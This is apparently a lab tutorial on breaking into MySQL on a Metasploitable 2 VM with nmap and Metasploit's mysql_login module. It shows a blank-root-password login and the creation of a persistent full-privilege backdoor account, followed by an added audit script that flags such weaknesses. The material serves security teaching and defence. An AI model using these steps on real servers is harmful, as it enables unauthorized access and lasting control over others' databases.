The Metasploitable virtual machine is an intentionally vulnerable
version of Ubuntu Linux designed for testing security tools and
demonstrating common vulnerabilities. This virtual machine is compatible
with VMware, VirtualBox, and other common virtualization platforms.
We have installed 'Metasploitable 2' and Kali Linux as virtual machines in KVM on CentOS 7. For instructions on how to install the Metasploitable 2 virtual machine in KVM, refer to this post.
In a previous post, we carried out a vulnerability scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali Linux.
In this post, we will hack MySQL Server using Metasploit in Kali Linux.
We have the following scenario:
Metasploitable2 IP Address: 192.168.122.74
Kali Linux IP Address: 192.168.122.115
Perform the following steps on the Kali Linux machine:
1) We perform a port scan on the Metasploitable machine and see that the mysql port is open.
root@kali:~# nmap -p 3306 192.168.122.74
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-07 11:09 IST
Nmap scan report for 192.168.122.74
Host is up (0.00062s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
2) We will try to find the password for the 'root' user. We will try a blank password first and see if it works.
root@kali:~# msfconsole
msf > search mysql
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BLANK_PASSWORDS   false            no        Try blank passwords for all users
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
DB_ALL_PASS       false            no        Add all passwords in the current database to the list
DB_ALL_USERS      false            no        Add all users in the current database to the list
PASSWORD                           no        A specific password to authenticate with
PASS_FILE                          no        File containing passwords, one per line
Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                             yes       The target address range or CIDR identifier
RPORT             3306             yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads
USERNAME                           no        A specific username to authenticate as
USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS      false            no        Try the username as the password for all users
USER_FILE                          no        File containing usernames, one per line
VERBOSE           true             yes       Whether to print output for all attempts
msf auxiliary(mysql_login) > set RHOSTS 192.168.122.74
RHOSTS => 192.168.122.74
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(mysql_login) > exploit
[*] 192.168.122.74:3306 MYSQL - Found remote MySQL version 5.0.51a
[!] No active DB -- Credential data will not be saved!
[!] No active DB -- Credential data will not be saved!
[+] 192.168.122.74:3306 MYSQL - Success: 'root:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) > quit
root@kali:~#
3) We are lucky. Now we will log in to the mysql server as user 'root' with a blank password.
root@kali:~# mysql -u root -h 192.168.122.74
4) We create a user 'shabbir' with password 'shabbir' having full administrative control over the mysql database.
mysql> grant all on *.* to shabbir@192.168.122.115 identified by 'shabbir';
Query OK, 0 rows affected (0.00 sec)
mysql> quit
Bye
5) We can now log in to the mysql database whenever we want with username 'shabbir' and password 'shabbir' and have full administrative access.
root@kali:~# mysql -u shabbir -h 192.168.122.74 -p
Enter password:
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)
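A defender-side check for the two conditions this walkthrough relies on (an account with a blank password reachable over the network, and an account holding global privileges from a remote host), as an added example that is not part of the original post. It assumes the rows of mysql.user have been exported as tab-separated text; the `audit` function, the sample rows and the `webapp` account are constructed for illustration.

```python
"""Audit rows exported from mysql.user for the weaknesses shown above."""

# Column names are those of MySQL 5.0-5.6 (the walkthrough's server is 5.0.51a);
# from 5.7 on the hash is stored in authentication_string instead of Password.
EXPORT_QUERY = "SELECT User, Host, Password, Super_priv, File_priv FROM mysql.user"

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

# Constructed sample of `mysql -N -B -e "<EXPORT_QUERY>"` output (tab separated).
# The hash values are placeholders, not real password hashes.
SAMPLE = (
    "root\t%\t\tY\tY\n"
    "shabbir\t192.168.122.115\t*PLACEHOLDER_HASH\tY\tY\n"
    "webapp\tlocalhost\t*PLACEHOLDER_HASH\tN\tN\n"
    "\tlocalhost\t\tN\tN\n"
)


def audit(tsv):
    """Return a sorted list of (account, finding) tuples."""
    findings = []
    for line in tsv.splitlines():
        if not line:
            continue
        fields = line.split("\t")
        if len(fields) != 5:
            raise ValueError("expected 5 tab-separated columns: %r" % line)
        user, host, pw_hash, super_priv, file_priv = fields
        account = "'%s'@'%s'" % (user, host)
        if user == "":
            findings.append((account, "anonymous account"))
        if pw_hash == "":
            findings.append((account, "blank password"))
        if "%" in host:
            findings.append((account, "wildcard host"))
        # SUPER and FILE are global privileges; `grant all on *.*` sets both.
        if host not in LOCAL_HOSTS and "Y" in (super_priv, file_priv):
            findings.append((account, "global privilege from remote host"))
    return sorted(findings)


if __name__ == "__main__":
    for account, finding in audit(SAMPLE):
        print("%-32s %s" % (account, finding))
```

Flagged accounts are corrected on the server with SET PASSWORD, REVOKE or DROP USER, and by restricting which hosts can reach port 3306.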